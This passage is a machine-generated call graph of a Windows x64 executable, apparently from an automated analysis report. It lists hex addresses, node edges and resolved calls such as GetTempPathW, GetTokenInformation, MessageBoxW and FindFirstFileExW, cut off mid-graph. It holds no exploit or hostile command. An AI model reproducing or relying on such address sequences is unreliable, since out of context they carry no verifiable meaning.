7ff6d6ea24b3 17068->17069 17070 7ff6d6ea24e2 17069->17070 17072 7ff6d6ea259f 17069->17072 17071 7ff6d6ea14b0 12 API calls 17070->17071 17074 7ff6d6ea251f 17070->17074 17071->17074 17073 7ff6d6eab5cc _invalid_parameter_noinfo 37 API calls 17072->17073 17073->17074 17074->17009 17076 7ff6d6ea20a3 17075->17076 17077 7ff6d6ea20d2 17076->17077 17079 7ff6d6ea218f 17076->17079 17078 7ff6d6ea14b0 12 API calls 17077->17078 17081 7ff6d6ea210f 17077->17081 17078->17081 17080 7ff6d6eab5cc _invalid_parameter_noinfo 37 API calls 17079->17080 17080->17081 17081->17009 17083 7ff6d6ea28c3 17082->17083 17084 7ff6d6ea28f2 17083->17084 17086 7ff6d6ea29af 17083->17086 17085 7ff6d6ea14b0 12 API calls 17084->17085 17088 7ff6d6ea292f 17084->17088 17085->17088 17087 7ff6d6eab5cc _invalid_parameter_noinfo 37 API calls 17086->17087 17087->17088 17088->17009 17090 7ff6d6eaf630 17089->17090 17091 7ff6d6eaf675 17090->17091 17092 7ff6d6ea50f0 45 API calls 17090->17092 17093 7ff6d6eaf635 __scrt_get_show_window_mode 17090->17093 17098 7ff6d6eaf65e __scrt_get_show_window_mode 17090->17098 17091->17093 17091->17098 17242 7ff6d6eb1640 17091->17242 17092->17091 17093->17009 17094 7ff6d6eab5cc _invalid_parameter_noinfo 37 API calls 17094->17093 17098->17093 17098->17094 17100 7ff6d6ea14e7 17099->17100 17101 7ff6d6ea14d6 17099->17101 17100->17101 17129 7ff6d6eae3ac 17100->17129 17107 7ff6d6eaf320 17101->17107 17104 7ff6d6ea1528 17105 7ff6d6eab700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17104->17105 17105->17101 17106 7ff6d6eab700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17106->17104 17108 7ff6d6eaf370 17107->17108 17109 7ff6d6eaf33d 17107->17109 17108->17109 17111 7ff6d6eaf3a2 17108->17111 17110 7ff6d6eab5cc _invalid_parameter_noinfo 37 API calls 17109->17110 17120 7ff6d6ea4971 17110->17120 17116 7ff6d6eaf4b5 17111->17116 17122 7ff6d6eaf3ea 17111->17122 17112 7ff6d6eaf5a7 17169 7ff6d6eae80c 17112->17169 17114 7ff6d6eaf56d 17162 7ff6d6eaeba4 17114->17162 17116->17112 17116->17114 17117 7ff6d6eaf53c 17116->17117 17119 7ff6d6eaf4ff 17116->17119 17121 7ff6d6eaf4f5 17116->17121 17155 7ff6d6eaee84 17117->17155 17145 7ff6d6eaf0b4 17119->17145 17120->17056 17120->17058 17121->17114 17124 7ff6d6eaf4fa 17121->17124 17122->17120 17136 7ff6d6eab25c 17122->17136 17124->17117 17124->17119 17127 7ff6d6eab6b8 _wfindfirst32i64 17 API calls 17128 7ff6d6eaf604 17127->17128 17130 7ff6d6eae3f7 17129->17130 17134 7ff6d6eae3bb _set_fmode 17129->17134 17132 7ff6d6ea5cb4 _set_fmode 11 API calls 17130->17132 17131 7ff6d6eae3de RtlAllocateHeap 17133 7ff6d6ea1514 17131->17133 17131->17134 17132->17133 17133->17104 17133->17106 17134->17130 17134->17131 17135 7ff6d6eb43e0 _set_fmode 2 API calls 17134->17135 17135->17134 17137 7ff6d6eab269 17136->17137 17139 7ff6d6eab273 17136->17139 17137->17139 17143 7ff6d6eab28e 17137->17143 17138 7ff6d6ea5cb4 _set_fmode 11 API calls 17140 7ff6d6eab27a 17138->17140 17139->17138 17141 7ff6d6eab698 _invalid_parameter_noinfo 37 API calls 17140->17141 17142 7ff6d6eab286 17141->17142 17142->17120 17142->17127 17143->17142 17144 7ff6d6ea5cb4 _set_fmode 11 API calls 17143->17144 17144->17140 17178 7ff6d6eb4efc 17145->17178 17149 7ff6d6eaf15c 17150 7ff6d6eaf1b1 17149->17150 17152 7ff6d6eaf17c 17149->17152 17154 7ff6d6eaf160 17149->17154 17231 7ff6d6eaeca0 17150->17231 17227 7ff6d6eaef5c 17152->17227 17154->17120 17156 7ff6d6eb4efc 38 API calls 17155->17156 17157 7ff6d6eaeece 17156->17157 17158 7ff6d6eb4944 37 API calls 17157->17158 17159 7ff6d6eaef1e 17158->17159 17160 7ff6d6eaef22 17159->17160 17161 7ff6d6eaef5c 45 API calls 17159->17161 17160->17120 17161->17160 17163 7ff6d6eb4efc 38 API calls 17162->17163 17164 7ff6d6eaebef 17163->17164 17165 7ff6d6eb4944 37 API calls 17164->17165 17166 7ff6d6eaec47 17165->17166 17167 7ff6d6eaec4b 17166->17167 17168 7ff6d6eaeca0 45 API calls 17166->17168 17167->17120 17168->17167 17170 7ff6d6eae851 17169->17170 17171 7ff6d6eae884 17169->17171 17173 7ff6d6eab5cc _invalid_parameter_noinfo 37 API calls 17170->17173 17172 7ff6d6eae89c 17171->17172 17175 7ff6d6eae91d 17171->17175 17174 7ff6d6eaeba4 46 API calls 17172->17174 17177 7ff6d6eae87d __scrt_get_show_window_mode 17173->17177 17174->17177 17176 7ff6d6ea50f0 45 API calls 17175->17176 17175->17177 17176->17177 17177->17120 17179 7ff6d6eb4f4f fegetenv 17178->17179 17180 7ff6d6eb8e5c 37 API calls 17179->17180 17186 7ff6d6eb4fa2 17180->17186 17181 7ff6d6eb4fcf 17185 7ff6d6eab25c __std_exception_copy 37 API calls 17181->17185 17182 7ff6d6eb5092 17183 7ff6d6eb8e5c 37 API calls 17182->17183 17184 7ff6d6eb50bc 17183->17184 17189 7ff6d6eb8e5c 37 API calls 17184->17189 17190 7ff6d6eb504d 17185->17190 17186->17182 17187 7ff6d6eb4fbd 17186->17187 17188 7ff6d6eb506c 17186->17188 17187->17181 17187->17182 17193 7ff6d6eab25c __std_exception_copy 37 API calls 17188->17193 17191 7ff6d6eb50cd 17189->17191 17192 7ff6d6eb6174 17190->17192 17197 7ff6d6eb5055 17190->17197 17194 7ff6d6eb9050 20 API calls 17191->17194 17195 7ff6d6eab6b8 _wfindfirst32i64 17 API calls 17192->17195 17193->17190 17205 7ff6d6eb5136 __scrt_get_show_window_mode 17194->17205 17196 7ff6d6eb6189 17195->17196 17198 7ff6d6e9c010 _wfindfirst32i64 8 API calls 17197->17198 17199 7ff6d6eaf101 17198->17199 17223 7ff6d6eb4944 17199->17223 17200 7ff6d6eb54df __scrt_get_show_window_mode 17201 7ff6d6eb581f 17202 7ff6d6eb4a60 37 API calls 17201->17202 17207 7ff6d6eb5f37 17202->17207 17203 7ff6d6eb5177 memcpy_s 17216 7ff6d6eb5abb memcpy_s __scrt_get_show_window_mode 17203->17216 17218 7ff6d6eb55d3 memcpy_s __scrt_get_show_window_mode 17203->17218 17204 7ff6d6eb57cb 17204->17201 17204->17204 17206 7ff6d6eb618c memcpy_s 37 API calls 17204->17206 17205->17200 17205->17203 17208 7ff6d6ea5cb4 _set_fmode 11 API calls 17205->17208 17206->17201 17207->17207 17212 7ff6d6eb618c memcpy_s 37 API calls 17207->17212 17221 7ff6d6eb5f92 17207->17221 17210 7ff6d6eb55b0 17208->17210 17209 7ff6d6eb6118 17213 7ff6d6eb8e5c 37 API calls 17209->17213 17211 7ff6d6eab698 _invalid_parameter_noinfo 37 API calls 17210->17211 17211->17203 17212->17221 17213->17197 17214 7ff6d6ea5cb4 11 API calls _set_fmode 17214->17216 17215 7ff6d6ea5cb4 11 API calls _set_fmode 17215->17218 17216->17201 17216->17204 17216->17214 17222 7ff6d6eab698 37 API calls _invalid_parameter_noinfo 17216->17222 17217 7ff6d6eab698 37 API calls _invalid_parameter_noinfo 17217->17218 17218->17204 17218->17215 17218->17217 17219 7ff6d6eb4a60 37 API calls 17219->17221 17220 7ff6d6eb618c memcpy_s 37 API calls 17220->17221 17221->17209 17221->17219 17221->17220 17222->17216 17224 7ff6d6eb4963 17223->17224 17225 7ff6d6eab5cc _invalid_parameter_noinfo 37 API calls 17224->17225 17226 7ff6d6eb498e memcpy_s 17224->17226 17225->17226 17226->17149 17228 7ff6d6eaef88 memcpy_s 17227->17228 17229 7ff6d6ea50f0 45 API calls 17228->17229 17230 7ff6d6eaf042 memcpy_s __scrt_get_show_window_mode 17228->17230 17229->17230 17230->17154 17232 7ff6d6eaecdb 17231->17232 17235 7ff6d6eaed28 memcpy_s 17231->17235 17233 7ff6d6eab5cc _invalid_parameter_noinfo 37 API calls 17232->17233 17234 7ff6d6eaed07 17233->17234 17234->17154 17236 7ff6d6eaed93 17235->17236 17238 7ff6d6ea50f0 45 API calls 17235->17238 17237 7ff6d6eab25c __std_exception_copy 37 API calls 17236->17237 17241 7ff6d6eaedd5 memcpy_s 17237->17241 17238->17236 17239 7ff6d6eab6b8 _wfindfirst32i64 17 API calls 17240 7ff6d6eaee80 17239->17240 17241->17239 17244 7ff6d6eb1664 WideCharToMultiByte 17242->17244 17246 7ff6d6ea1671 17245->17246 17247 7ff6d6ea1683 17245->17247 17248 7ff6d6ea5cb4 _set_fmode 11 API calls 17246->17248 17249 7ff6d6ea1690 17247->17249 17253 7ff6d6ea16cd 17247->17253 17250 7ff6d6ea1676 17248->17250 17252 7ff6d6eab5cc _invalid_parameter_noinfo 37 API calls 17249->17252 17251 7ff6d6eab698 _invalid_parameter_noinfo 37 API calls 17250->17251 17257 7ff6d6ea1681 17251->17257 17252->17257 17254 7ff6d6ea1776 17253->17254 17255 7ff6d6ea5cb4 _set_fmode 11 API calls 17253->17255 17256 7ff6d6ea5cb4 _set_fmode 11 API calls 17254->17256 17254->17257 17258 7ff6d6ea176b 17255->17258 17259 7ff6d6ea1820 17256->17259 17257->16974 17260 7ff6d6eab698 _invalid_parameter_noinfo 37 API calls 17258->17260 17261 7ff6d6eab698 _invalid_parameter_noinfo 37 API calls 17259->17261 17260->17254 17261->17257 17263 7ff6d6eae781 17262->17263 17265 7ff6d6ea512f 17262->17265 17263->17265 17270 7ff6d6eb4154 17263->17270 17266 7ff6d6eae7d4 17265->17266 17267 7ff6d6ea513f 17266->17267 17268 7ff6d6eae7ed 17266->17268 17267->16974 17268->17267 17283 7ff6d6eb34a0 17268->17283 17271 7ff6d6eabf00 _CreateFrameInfo 45 API calls 17270->17271 17272 7ff6d6eb4163 17271->17272 17273 7ff6d6eb41ae 17272->17273 17282 7ff6d6eb11a8 EnterCriticalSection 17272->17282 17273->17265 17284 7ff6d6eabf00 _CreateFrameInfo 45 API calls 17283->17284 17285 7ff6d6eb34a9 17284->17285 17293 7ff6d6ea5b5c EnterCriticalSection 17286->17293 17295 7ff6d6e9288c 17294->17295 17296 7ff6d6ea52b4 49 API calls 17295->17296 17297 7ff6d6e928dd 17296->17297 17298 7ff6d6ea5cb4 _set_fmode 11 API calls 17297->17298 17299 7ff6d6e928e2 17298->17299 17313 7ff6d6ea5cd4 17299->17313 17302 7ff6d6e91ee0 49 API calls 17303 7ff6d6e92911 __scrt_get_show_window_mode 17302->17303 17304 7ff6d6e98de0 57 API calls 17303->17304 17305 7ff6d6e92946 17304->17305 17306 7ff6d6e92983 MessageBoxA 17305->17306 17307 7ff6d6e9294b 17305->17307 17308 7ff6d6e9299d 17306->17308 17309 7ff6d6e98de0 57 API calls 17307->17309 17310 7ff6d6e9c010 _wfindfirst32i64 8 API calls 17308->17310 17311 7ff6d6e92965 MessageBoxW 17309->17311 17312 7ff6d6e929ad 17310->17312 17311->17308 17312->16640 17314 7ff6d6eac078 _set_fmode 11 API calls 17313->17314 17315 7ff6d6ea5ceb 17314->17315 17316 7ff6d6e928e9 17315->17316 17317 7ff6d6eaf948 _set_fmode 11 API calls 17315->17317 17320 7ff6d6ea5d2b 17315->17320 17316->17302 17318 7ff6d6ea5d20 17317->17318 17319 7ff6d6eab700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17318->17319 17319->17320 17320->17316 17325 7ff6d6eb0018 17320->17325 17323 7ff6d6eab6b8 _wfindfirst32i64 17 API calls 17324 7ff6d6ea5d70 17323->17324 17329 7ff6d6eb0035 17325->17329 17326 7ff6d6eb003a 17327 7ff6d6ea5d51 17326->17327 17328 7ff6d6ea5cb4 _set_fmode 11 API calls 17326->17328 17327->17316 17327->17323 17330 7ff6d6eb0044 17328->17330 17329->17326 17329->17327 17332 7ff6d6eb0084 17329->17332 17331 7ff6d6eab698 _invalid_parameter_noinfo 37 API calls 17330->17331 17331->17327 17332->17327 17333 7ff6d6ea5cb4 _set_fmode 11 API calls 17332->17333 17333->17330 17335 7ff6d6e98f82 WideCharToMultiByte 17334->17335 17336 7ff6d6e98f14 WideCharToMultiByte 17334->17336 17337 7ff6d6e98faf 17335->17337 17341 7ff6d6e93f6b 17335->17341 17338 7ff6d6e98f3e 17336->17338 17342 7ff6d6e98f55 17336->17342 17340 7ff6d6e929c0 57 API calls 17337->17340 17339 7ff6d6e929c0 57 API calls 17338->17339 17339->17341 17340->17341 17341->16650 17341->16651 17342->17335 17343 7ff6d6e98f6b 17342->17343 17344 7ff6d6e929c0 57 API calls 17343->17344 17344->17341 17346 7ff6d6e940ea 17345->17346 17347 7ff6d6e98de0 57 API calls 17346->17347 17348 7ff6d6e94112 17347->17348 17363 7ff6d6e98d00 FindFirstFileExW 17348->17363 17351 7ff6d6e9c010 _wfindfirst32i64 8 API calls 17352 7ff6d6e93f88 17351->17352 17352->16655 17352->16658 17354 7ff6d6e94352 17353->17354 17355 7ff6d6e98de0 57 API calls 17354->17355 17356 7ff6d6e94380 CreateFileW 17355->17356 17357 7ff6d6e943b7 GetFinalPathNameByHandleW CloseHandle 17356->17357 17358 7ff6d6e9441f 17356->17358 17357->17358 17359 7ff6d6e943e3 __vcrt_InitializeCriticalSectionEx 17357->17359 17360 7ff6d6e9c010 _wfindfirst32i64 8 API calls 17358->17360 17361 7ff6d6e98ef0 59 API calls 17359->17361 17362 7ff6d6e93fb9 17360->17362 17361->17358 17362->16655 17364 7ff6d6e98d50 17363->17364 17365 7ff6d6e98d3d FindClose 17363->17365 17366 7ff6d6e9c010 _wfindfirst32i64 8 API calls 17364->17366 17365->17364 17367 7ff6d6e9411c 17366->17367 17367->17351 17369 7ff6d6e97dee 17368->17369 17370 7ff6d6eab1d3 17368->17370 17369->16676 17370->17369 17371 7ff6d6eab25c __std_exception_copy 37 API calls 17370->17371 17372 7ff6d6eab200 17371->17372 17372->17369 17373 7ff6d6eab6b8 _wfindfirst32i64 17 API calls 17372->17373 17374 7ff6d6eab230 17373->17374 17376 7ff6d6e94060 116 API calls 17375->17376 17377 7ff6d6e91ac6 17376->17377 17378 7ff6d6e984c0 83 API calls 17377->17378 17385 7ff6d6e91c74 17377->17385 17381 7ff6d6e91afe 17378->17381 17379 7ff6d6e9c010 _wfindfirst32i64 8 API calls 17380 7ff6d6e91c88 17379->17380 17380->16695 17408 7ff6d6e93e80 17380->17408 17407 7ff6d6e91b2f 17381->17407 17414 7ff6d6ea1004 17381->17414 17383 7ff6d6ea097c 74 API calls 17383->17385 17384 7ff6d6e91b18 17386 7ff6d6e91b34 17384->17386 17387 7ff6d6e91b1c 17384->17387 17385->17379 17418 7ff6d6ea0ccc 17386->17418 17388 7ff6d6e92870 59 API calls 17387->17388 17388->17407 17391 7ff6d6e91b4f 17393 7ff6d6e92870 59 API calls 17391->17393 17392 7ff6d6e91b67 17394 7ff6d6ea1004 73 API calls 17392->17394 17393->17407 17395 7ff6d6e91bb4 17394->17395 17396 7ff6d6e91bde 17395->17396 17397 7ff6d6e91bc6 17395->17397 17399 7ff6d6ea0ccc _fread_nolock 53 API calls 17396->17399 17398 7ff6d6e92870 59 API calls 17397->17398 17398->17407 17400 7ff6d6e91bf3 17399->17400 17401 7ff6d6e91c0e 17400->17401 17402 7ff6d6e91bf9 17400->17402 17421 7ff6d6ea0a40 17401->17421 17404 7ff6d6e92870 59 API calls 17402->17404 17404->17407 17406 7ff6d6e92b10 59 API calls 17406->17407 17407->17383 17409 7ff6d6e91ee0 49 API calls 17408->17409 17410 7ff6d6e93e9d 17409->17410 17410->16696 17412 7ff6d6e91ee0 49 API calls 17411->17412 17413 7ff6d6e94170 17412->17413 17413->16695 17415 7ff6d6ea1034 17414->17415 17427 7ff6d6ea0d94 17415->17427 17417 7ff6d6ea104d 17417->17384 17439 7ff6d6ea0cec 17418->17439 17422 7ff6d6ea0a49 17421->17422 17423 7ff6d6e91c22 17421->17423 17424 7ff6d6ea5cb4 _set_fmode 11 API calls 17422->17424 17423->17406 17423->17407 17425 7ff6d6ea0a4e 17424->17425 17428 7ff6d6ea0dfe 17427->17428 17429 7ff6d6ea0dbe 17427->17429 17428->17429 17430 7ff6d6ea0e0a 17428->17430 17431 7ff6d6eab5cc _invalid_parameter_noinfo 37 API calls 17429->17431 17438 7ff6d6ea5b5c EnterCriticalSection 17430->17438 17433 7ff6d6ea0de5 17431->17433 17433->17417 17440 7ff6d6ea0d16 17439->17440 17441 7ff6d6e91b49 17439->17441 17440->17441 17442 7ff6d6ea0d62 17440->17442 17443 7ff6d6ea0d25 __scrt_get_show_window_mode 17440->17443 17441->17391 17441->17392 17452 7ff6d6ea5b5c EnterCriticalSection 17442->17452 17445 7ff6d6ea5cb4 _set_fmode 11 API calls 17443->17445 17447 7ff6d6ea0d3a 17445->17447 17449 7ff6d6eab698 _invalid_parameter_noinfo 37 API calls 17447->17449 17449->17441 17454 7ff6d6e9889f GetTokenInformation 17453->17454 17455 7ff6d6e98921 __std_exception_copy 17453->17455 17456 7ff6d6e988c0 GetLastError 17454->17456 17457 7ff6d6e988cb 17454->17457 17458 7ff6d6e98934 CloseHandle 17455->17458 17459 7ff6d6e9893a 17455->17459 17456->17455 17456->17457 17457->17455 17460 7ff6d6e988e7 GetTokenInformation 17457->17460 17458->17459 17459->16705 17460->17455 17461 7ff6d6e9890a 17460->17461 17461->17455 17462 7ff6d6e98914 ConvertSidToStringSidW 17461->17462 17462->17455 17464 7ff6d6e98975 17463->17464 17480 7ff6d6ea5508 17464->17480 17468 7ff6d6e92c50 17467->17468 17469 7ff6d6ea52b4 49 API calls 17468->17469 17470 7ff6d6e92c9b __scrt_get_show_window_mode 17469->17470 17471 7ff6d6e98de0 57 API calls 17470->17471 17472 7ff6d6e92cd0 17471->17472 17473 7ff6d6e92cd5 17472->17473 17474 7ff6d6e92d0d MessageBoxA 17472->17474 17476 7ff6d6e98de0 57 API calls 17473->17476 17475 7ff6d6e92d27 17474->17475 17477 7ff6d6e9c010 _wfindfirst32i64 8 API calls 17475->17477 17478 7ff6d6e92cef MessageBoxW 17476->17478 17479 7ff6d6e92d37 17477->17479 17478->17475 17479->16715 17482 7ff6d6ea5562 17480->17482 17481 7ff6d6ea5587 17483 7ff6d6eab5cc _invalid_parameter_noinfo 37 API calls 17481->17483 17482->17481 17484 7ff6d6ea55c3 17482->17484 17486 7ff6d6ea55b1 17483->17486 17498 7ff6d6ea38c0 17484->17498 17488 7ff6d6e9c010 _wfindfirst32i64 8 API calls 17486->17488 17490 7ff6d6e98998 17488->17490 17489 7ff6d6eab700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17489->17486 17490->16712 17491 7ff6d6ea56a4 17491->17489 17492 7ff6d6ea5679 17496 7ff6d6eab700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17492->17496 17493 7ff6d6ea5670 17493->17491 17493->17492 17494 7ff6d6ea56ca 17494->17491 17495 7ff6d6ea56d4 17494->17495 17497 7ff6d6eab700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17495->17497 17496->17486 17497->17486 17499 7ff6d6ea38fe 17498->17499 17500 7ff6d6ea38ee 17498->17500 17501 7ff6d6ea3907 17499->17501 17506 7ff6d6ea3935 17499->17506 17502 7ff6d6eab5cc _invalid_parameter_noinfo 37 API calls 17500->17502 17503 7ff6d6eab5cc _invalid_parameter_noinfo 37 API calls 17501->17503 17504 7ff6d6ea392d 17502->17504 17503->17504 17504->17491 17504->17492 17504->17493 17504->17494 17506->17500 17506->17504 17509 7ff6d6ea42d4 17506->17509 17542 7ff6d6ea3d20 17506->17542 17579 7ff6d6ea34b0 17506->17579 17510 7ff6d6ea4387 17509->17510 17511 7ff6d6ea4316 17509->17511 17514 7ff6d6ea43e0 17510->17514 17515 7ff6d6ea438c 17510->17515 17512 7ff6d6ea43b1 17511->17512 17513 7ff6d6ea431c 17511->17513 17598 7ff6d6ea2684 17512->17598 17516 7ff6d6ea4321 17513->17516 17517 7ff6d6ea4350 17513->17517 17521 7ff6d6ea43f7 17514->17521 17523 7ff6d6ea43ea 17514->17523 17524 7ff6d6ea43ef 17514->17524 17518 7ff6d6ea438e 17515->17518 17519 7ff6d6ea43c1 17515->17519 17516->17521 17522 7ff6d6ea4327 17516->17522 17517->17522 17517->17524 17530 7ff6d6ea439d 17518->17530 17532 7ff6d6ea4330 17518->17532 17605 7ff6d6ea2274 17519->17605 17612 7ff6d6ea4fdc 17521->17612 17528 7ff6d6ea4362 17522->17528 17522->17532 17537 7ff6d6ea434b 17522->17537 17523->17512 17523->17524 17540 7ff6d6ea4420 17524->17540 17616 7ff6d6ea2a94 17524->17616 17528->17540 17592 7ff6d6ea4dc4 17528->17592 17530->17512 17533 7ff6d6ea43a2 17530->17533 17532->17540 17582 7ff6d6ea4a88 17532->17582 17535 7ff6d6ea4e88 37 API calls 17533->17535 17533->17540 17534 7ff6d6e9c010 _wfindfirst32i64 8 API calls 17536 7ff6d6ea471a 17534->17536 17535->17537 17536->17506 17538 7ff6d6ea50f0 45 API calls 17537->17538 17537->17540 17541 7ff6d6ea460c 17537->17541 17538->17541 17540->17534 17541->17540 17623 7ff6d6eaf7b8 17541->17623 17543 7ff6d6ea3d2e 17542->17543 17544 7ff6d6ea3d44 17542->17544 17545 7ff6d6ea3d84 17543->17545 17546 7ff6d6ea4387 17543->17546 17547 7ff6d6ea4316 17543->17547 17544->17545 17548 7ff6d6eab5cc _invalid_parameter_noinfo 37 API calls 17544->17548 17545->17506 17551 7ff6d6ea43e0 17546->17551 17552 7ff6d6ea438c 17546->17552 17549 7ff6d6ea43b1 17547->17549 17550 7ff6d6ea431c 17547->17550 17548->17545 17557 7ff6d6ea2684 38 API calls 17549->17557 17553 7ff6d6ea4321 17550->17553 17554 7ff6d6ea4350 17550->17554 17558 7ff6d6ea43f7 17551->17558 17561 7ff6d6ea43ea 17551->17561 17564 7ff6d6ea43ef 17551->17564 17555 7ff6d6ea438e 17552->17555 17556 7ff6d6ea43c1 17552->17556 17553->17558 17559 7ff6d6ea4327 17553->17559 17554->17559 17554->17564 17560 7ff6d6ea4330 17555->17560 17568 7ff6d6ea439d 17555->17568 17562 7ff6d6ea2274 38 API calls 17556->17562 17574 7ff6d6ea434b 17557->17574 17565 7ff6d6ea4fdc 45 API calls 17558->17565 17559->17560 17566 7ff6d6ea4362 17559->17566 17559->17574 17563 7ff6d6ea4a88 47 API calls 17560->17563 17577 7ff6d6ea4420 17560->17577 17561->17549 17561->17564 17562->17574 17563->17574 17567 7ff6d6ea2a94 38 API calls 17564->17567 17564->17577 17565->17574 17570 7ff6d6ea4dc4 46 API calls 17566->17570 17566->17577 17567->17574 17568->17549 17569 7ff6d6ea43a2 17568->17569 17572 7ff6d6ea4e88 37 API calls 17569->17572 17569->17577 17570->17574 17571 7ff6d6e9c010 _wfindfirst32i64 8 API calls 17573 7ff6d6ea471a 17571->17573 17572->17574 17573->17506 17575 7ff6d6ea50f0 45 API calls 17574->17575 17574->17577 17578 7ff6d6ea460c 17574->17578 17575->17578 17576 7ff6d6eaf7b8 46 API calls 17576->17578 17577->17571 17578->17576 17578->17577 17657 7ff6d6ea18f8 17579->17657 17583 7ff6d6ea4aae 17582->17583 17584 7ff6d6ea14b0 12 API calls 17583->17584 17585 7ff6d6ea4afe 17584->17585 17593 7ff6d6ea4df9 17592->17593 17594 7ff6d6ea4e17 17593->17594 17595 7ff6d6ea50f0 45 API calls 17593->17595 17597 7ff6d6ea4e3e 17593->17597 17595->17594 17597->17537 17599 7ff6d6ea26b7 17598->17599 17600 7ff6d6ea26e6 17599->17600 17602 7ff6d6ea27a3 17599->17602 17604 7ff6d6ea2723 17600->17604 17635 7ff6d6ea1558 17600->17635 17603 7ff6d6eab5cc _invalid_parameter_noinfo 37 API calls 17602->17603 17603->17604 17604->17537 17606 7ff6d6ea22a7 17605->17606 17607 7ff6d6ea22d6 17606->17607 17609 7ff6d6ea2393 17606->17609 17608 7ff6d6ea1558 12 API calls 17607->17608 17611 7ff6d6ea2313 17607->17611 17608->17611 17610 7ff6d6eab5cc _invalid_parameter_noinfo 37 API calls 17609->17610 17610->17611 17611->17537 17613 7ff6d6ea501f 17612->17613 17614 7ff6d6ea5023 __crtLCMapStringW 17613->17614 17643 7ff6d6ea5078 17613->17643 17614->17537 17617 7ff6d6ea2ac7 17616->17617 17618 7ff6d6ea2af6 17617->17618 17620 7ff6d6ea2bb3 17617->17620 17619 7ff6d6ea1558 12 API calls 17618->17619 17621 7ff6d6ea2b33 17618->17621 17619->17621 17622 7ff6d6eab5cc _invalid_parameter_noinfo 37 API calls 17620->17622 17621->17537 17622->17621 17624 7ff6d6eaf7e9 17623->17624 17632 7ff6d6eaf7f7 17623->17632 17624->17632 17632->17541 17636 7ff6d6ea158f 17635->17636 17642 7ff6d6ea157e 17635->17642 17637 7ff6d6eae3ac _fread_nolock 12 API calls 17636->17637 17636->17642 17642->17604 17644 7ff6d6ea509e 17643->17644 17645 7ff6d6ea5096 17643->17645 17644->17614 17646 7ff6d6ea50f0 45 API calls 17645->17646 17646->17644 17658 7ff6d6ea193f 17657->17658 17659 7ff6d6ea192d 17657->17659 17661 7ff6d6ea194d 17658->17661 17666 7ff6d6ea1989 17658->17666 17660 7ff6d6ea5cb4 _set_fmode 11 API calls 17659->17660 17662 7ff6d6ea1932 17660->17662 17663 7ff6d6eab5cc _invalid_parameter_noinfo 37 API calls 17661->17663 17664 7ff6d6eab698 _invalid_parameter_noinfo 37 API calls 17662->17664 17671 7ff6d6ea193d 17663->17671 17664->17671 17665 7ff6d6ea1d05 17667 7ff6d6ea5cb4 _set_fmode 11 API calls 17665->17667 17665->17671 17666->17665 17668 7ff6d6ea5cb4 _set_fmode 11 API calls 17666->17668 17669 7ff6d6ea1f99 17667->17669 17670 7ff6d6ea1cfa 17668->17670 17672 7ff6d6eab698 _invalid_parameter_noinfo 37 API calls 17669->17672 17673 7ff6d6eab698 _invalid_parameter_noinfo 37 API calls 17670->17673 17671->17506 17672->17671 17673->17665 17675 7ff6d6e97b76 17674->17675 17676 7ff6d6e97b9a 17675->17676 17677 7ff6d6e97bed GetTempPathW 17675->17677 17679 7ff6d6e97d70 61 API calls 17676->17679 17678 7ff6d6e97c02 17677->17678 17713 7ff6d6e92810 17678->17713 17680 7ff6d6e97ba6 17679->17680 17725 7ff6d6e97630 17680->17725 17691 7ff6d6e97c1b __std_exception_copy 17692 7ff6d6e97cc6 17691->17692 17696 7ff6d6e97c51 17691->17696 17717 7ff6d6ea92c8 17691->17717 17720 7ff6d6e98d80 17691->17720 17714 7ff6d6e92835 17713->17714 17715 7ff6d6ea5508 48 API calls 17714->17715 17716 7ff6d6e92854 17715->17716 17716->17691 17726 7ff6d6e9763c 17725->17726 17727 7ff6d6e98de0 57 API calls 17726->17727 17728 7ff6d6e9765e 17727->17728 17729 7ff6d6e97666 17728->17729 17730 7ff6d6e97679 ExpandEnvironmentStringsW 17728->17730 17732 7ff6d6e92b10 59 API calls 17729->17732 17731 7ff6d6e9769f __std_exception_copy 17730->17731 17998 7ff6d6e9172e 17997->17998 17999 7ff6d6e91716 17997->17999 18001 7ff6d6e91734 17998->18001 18002 7ff6d6e91758 17998->18002 18000 7ff6d6e92b10 59 API calls 17999->18000 18003 7ff6d6e91722 18000->18003 18127 7ff6d6e912a0 18001->18127 18090 7ff6d6e97e20 18002->18090 18003->16748 18008 7ff6d6e9174f 18008->16748 18009 7ff6d6e917a9 18011 7ff6d6e94060 116 API calls 18009->18011 18010 7ff6d6e9177d 18013 7ff6d6e92870 59 API calls 18010->18013 18014 7ff6d6e917be 18011->18014 18012 7ff6d6e92b10 59 API calls 18012->18008 18015 7ff6d6e91793 18013->18015 18016 7ff6d6e917de 18014->18016 18017 7ff6d6e917c6 18014->18017 18015->16748 18019 7ff6d6ea1004 73 API calls 18016->18019 18018 7ff6d6e92b10 59 API calls 18017->18018 18020 7ff6d6e917d5 18018->18020 18021 7ff6d6e917ef 18019->18021 18040 7ff6d6e92d66 18039->18040 18041 7ff6d6e91ee0 49 API calls 18040->18041 18043 7ff6d6e92d99 18041->18043 18042 7ff6d6e930ca 18043->18042 18044 7ff6d6e93e80 49 API calls 18043->18044 18045 7ff6d6e92e07 18044->18045 18046 7ff6d6e93e80 49 API calls 18045->18046 18047 7ff6d6e92e18 18046->18047 18048 7ff6d6e92e75 18047->18048 18049 7ff6d6e92e39 18047->18049 18051 7ff6d6e93190 75 API calls 18048->18051 18249 7ff6d6e93190 18049->18249 18052 7ff6d6e92e73 18051->18052 18053 7ff6d6e92eb4 18052->18053 18054 7ff6d6e92ef6 18052->18054 18257 7ff6d6e977b0 18053->18257 18055 7ff6d6e93190 75 API calls 18054->18055 18057 7ff6d6e92f20 18055->18057 18062 7ff6d6e93190 75 API calls 18057->18062 18067 7ff6d6e92fbc 18057->18067 18064 7ff6d6e92f52 18062->18064 18064->18067 18069 7ff6d6e93190 75 API calls 18064->18069 18065 7ff6d6e91ea0 59 API calls 18068 7ff6d6e9300f 18065->18068 18067->18065 18083 7ff6d6e930cf 18067->18083 18068->18042 18091 7ff6d6e97e30 18090->18091 18092 7ff6d6e91ee0 49 API calls 18091->18092 18093 7ff6d6e97e71 18092->18093 18107 7ff6d6e97ef1 18093->18107 18170 7ff6d6e93ff0 18093->18170 18095 7ff6d6e9c010 _wfindfirst32i64 8 API calls 18097 7ff6d6e91775 18095->18097 18097->18009 18097->18010 18098 7ff6d6e97f2b 